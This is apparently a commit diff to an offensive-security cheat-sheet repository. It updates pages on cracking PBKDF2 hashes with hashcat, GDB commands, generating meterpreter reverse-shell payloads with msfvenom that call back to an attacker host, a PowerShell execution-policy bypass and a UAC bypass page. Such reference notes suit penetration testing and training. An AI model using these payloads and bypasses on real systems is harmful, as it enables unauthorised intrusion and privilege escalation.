updated UAC bypass

hideckies · Aug 28, 2024 · 07e26de · 07e26de
1 parent 5a970d8
commit 07e26de
Show file tree

Hide file tree

Showing 5 changed files with 65 additions and 8 deletions.
diff --git a/src/exploit/cryptography/key-derivation-function/pbkdf2.md b/src/exploit/cryptography/key-derivation-function/pbkdf2.md
@@ -5,10 +5,22 @@ tags:
     - Cryptography
     - Key Derivation Function
 refs:
-date: 2023-08-06
+date: 2024-08-28
 draft: false
 ---
 
+## Algorithm Format
+
+```bash
+# Algorithm
+pbkdf2$<iteration>$<salt-length>
+
+# e.g.
+pbkdf2$10000$50
+```
+
+<br />
+
 ## PBKDF2-HMAC-SHA256
 
 PBKDF2 is part of PKCS#5 v2.0. The format is as follows:
@@ -29,7 +41,7 @@ echo 'sha256:10000:'$(echo '<salt-string>' | base64 | cut -c 1-14)':'$(echo 'pas
 Now crack the hash using Hashcat.
 
 ```sh
-hashcat -m 10900 wordlist.txt hash.txt
+hashcat -m 10900 hash.txt wordlist.txt
 ```
 
 <br />

diff --git a/src/exploit/reverse-engineering/cheatsheet/gdb-cheatsheet.md b/src/exploit/reverse-engineering/cheatsheet/gdb-cheatsheet.md
@@ -4,7 +4,7 @@ description: GDB (GNU Debugger) is a portable debugger used for reverse engineer
 tags:
     - Reverse Engineering
 refs:
-date: 2024-08-20
+date: 2024-08-28
 draft: false
 ---
 
@@ -83,7 +83,7 @@ delete 1
 d 1
 ```
 
-### View Values
+### Values
 
 ```sh
 # Print value of expression at specific address
@@ -103,6 +103,9 @@ info registers
 i r
 # Display information of the stack frame
 i f
+
+# Display current Program Counter
+info registers pc
 ```
 
 ### Change Values

diff --git a/src/exploit/shell/reverse-shell-with-metasploit.md b/src/exploit/shell/reverse-shell-with-metasploit.md
@@ -5,7 +5,7 @@ tags:
     - Privilege Escalation
     - Reverse Shell
 refs:
-date: 2024-01-26
+date: 2024-08-28
 draft: false
 ---
 
@@ -16,9 +16,12 @@ draft: false
 ```bash
 # Linux
 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf -o shell.elf
+msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf -o shell.elf
 
 # Windows
-msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe -o shell.exe
+msfvenom -p windows/x86/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe -o shell.exe
+msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe -o shell.exe
+
 msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f aspx -o shell.aspx
 ```
 

diff --git a/src/exploit/windows/powershell/powershell-executionpolicy-bypass.md b/src/exploit/windows/powershell/powershell-executionpolicy-bypass.md
@@ -0,0 +1,33 @@
+---
+title: PowerShell ExecutionPolicy Bypass
+description:
+tags:
+    - Windows
+refs:
+date: 2024-08-28
+draft: false
+---
+
+## Method 1. Set-ExecutionPolicy
+
+By default, the ExecutionPolicy is set to `Restricted`.
+
+```bash
+Get-ExecutionPolicy
+# Restricted
+```
+
+To bypass the restriction, run one of the following commands as **Administrator** privilege:
+
+```bash
+Set-ExecutionPolicy Unrestricted
+Set-ExecutionPolicy Bypass
+```
+
+<br />
+
+## Method 2. Run with `-ExecutionPolicy Bypass`
+
+```bash
+powershell -noexit -ExecutionPolicy Bypass -File example.ps1
+```
diff --git a/...ation/uac-windows-privilege-escalation.md → ...indows/privilege-escalation/uac-bypass.md b/...ation/uac-windows-privilege-escalation.md → ...indows/privilege-escalation/uac-bypass.md
@@ -1,11 +1,11 @@
 ---
-title: UAC Windows Privilege Escalation
+title: UAC Bypass
 description: UAC (User Account Control) is an access control enforcement feature.
 tags:
     - Windows
 refs:
     - https://github.com/nobodyatall648/CVE-2019-1388
-date: 2023-12-06
+date: 2024-08-29
 draft: false
 ---
 
@@ -15,6 +15,12 @@ draft: false
 
 <br />
 
+## Cheat Sheets
+
+- [uac-bypass-oneliners](https://github.com/blue0x1/uac-bypass-oneliners)
+
+<br />
+
 ## Investigation
 
 ```powershell